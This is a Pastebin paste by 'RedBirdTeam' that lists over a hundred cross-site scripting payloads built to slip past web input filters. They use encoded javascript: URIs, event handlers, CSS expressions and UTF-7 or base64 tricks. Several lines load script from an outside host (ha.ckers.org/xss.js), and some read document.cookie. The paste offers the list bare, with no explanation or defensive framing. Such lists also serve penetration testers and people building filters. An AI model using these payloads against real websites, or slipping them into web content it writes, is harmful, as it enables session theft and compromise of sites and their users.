API tools faq
paste
Advertisement
RedBirdTeam

Payloads XSS Filter Bypass List

RedBirdTeam
Feb 22nd, 2018
3,635
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 6.85 KB | None | 0 0
raw download clone embed print report
  1.  
  2.                   __   __ _____ _____                
  3.                   \ \ / // ____/ ____|                
  4.                    \ V /| (___| (___                  
  5.                     > <  \___ \\___ \       [RedBirdTeam]          
  6.                    / . \ ____) |___) |                
  7.   _____    __     / / \_\_____/_____/   _____   _____
  8.  |  __ \ /\\ \   / / |    / _ \   /\   |  __ \ / ____| <script>alert(/Payloads XSS Filter Bypass List/)</script>
  9.  | |__) /  \\ \_/ /| |   | | | | /  \  | |  | | (___  
  10.  |  ___/ /\ \\   / | |   | | | |/ /\ \ | |  | |\___ \
  11.  | |  / ____ \| |  | |___| |_| / ____ \| |__| |____) |
  12.  |_| /_/    \_\_|  |______\___/_/    \_\_____/|_____/
  13.      [byt3]
  14.                                                      
  15.  
  16. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  17. '';!--"<XSS>=&{()}
  18. 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  19. <script/src=data:,alert()>
  20. <marquee/onstart=alert()>
  21. <video/poster/onerror=alert()>
  22. <isindex/autofocus/onfocus=alert()>
  23. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  24. <IMG SRC="javascript:alert('XSS');">
  25. <IMG SRC=javascript:alert('XSS')>
  26. <IMG SRC=JaVaScRiPt:alert('XSS')>
  27. <IMG SRC=javascript:alert("XSS")>
  28. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  29. <a onmouseover="alert(document.cookie)">xxs link</a>
  30. <a onmouseover=alert(document.cookie)>xxs link</a>
  31. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  32. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  33. <IMG SRC=# onmouseover="alert('xxs')">
  34. <IMG SRC= onmouseover="alert('xxs')">
  35. <IMG onmouseover="alert('xxs')">
  36. <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
  37. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
  38. &#39;&#88;&#83;&#83;&#39;&#41;>
  39. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  40. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  41. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  42. <IMG SRC="jav   ascript:alert('XSS');">
  43. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  44. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  45. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  46. <IMG SRC=" &#14;  javascript:alert('XSS');">
  47. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  48. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  49. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  50. <<SCRIPT>alert("XSS");//<</SCRIPT>
  51. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  52. <SCRIPT SRC=//ha.ckers.org/.j>
  53. <IMG SRC="javascript:alert('XSS')"
  54. <iframe src=http://ha.ckers.org/scriptlet.html <
  55. \";alert('XSS');//
  56. </script><script>alert('XSS');</script>
  57. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  58. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  59. <BODY BACKGROUND="javascript:alert('XSS')">
  60. <IMG DYNSRC="javascript:alert('XSS')">
  61. <IMG LOWSRC="javascript:alert('XSS')">
  62. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  63. <IMG SRC='vbscript:msgbox("XSS")'>
  64. <IMG SRC="livescript:[code]">
  65. <BODY ONLOAD=alert('XSS')>
  66. <BGSOUND SRC="javascript:alert('XSS');">
  67. <BR SIZE="&{alert('XSS')}">
  68. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  69. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  70. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  71. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  72. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  73. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  74. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  75. exp/*<A STYLE='no\xss:noxss("*//*");
  76. xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  77. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  78. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  79. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  80. <XSS STYLE="xss:expression(alert('XSS'))">
  81. <XSS STYLE="behavior: url(xss.htc);">
  82. ¼script¾alert(¢XSS¢)¼/script¾
  83. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  84. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  85. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  86. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  87. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  88. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  89. <TABLE BACKGROUND="javascript:alert('XSS')">
  90. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  91. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  92. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  93. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  94. <DIV STYLE="width: expression(alert('XSS'));">
  95. <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
  96. <BASE HREF="javascript:alert('XSS');//">
  97. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  98. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  99. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  100. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  101. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  102. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  103. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  104. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  105. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  106. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  107. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  108. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  109. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  110. <A HREF="http://66.102.7.147/">XSS</A>
  111. 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  112. veris-->group<svg/onload=alert(/XSS/)//
  113. #"><img src=M onerror=alert('XSS');>
  114. element[attribute='<img src=x onerror=alert('XSS');>
  115. [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
  116. %22;alert%28%27RVRSH3LL_XSS%29//
  117. javascript:alert%281%29;
  118. <w contenteditable id=x onfocus=alert()>
  119. alert;pg("XSS")
  120. <svg/onload=%26%23097lert%26lpar;1337)>
  121. <script>for((i)in(self))eval(i)(1)</script>
  122. <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
  123. <sCR<script>iPt>alert(1)</SCr</script>IPt>
  124. <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!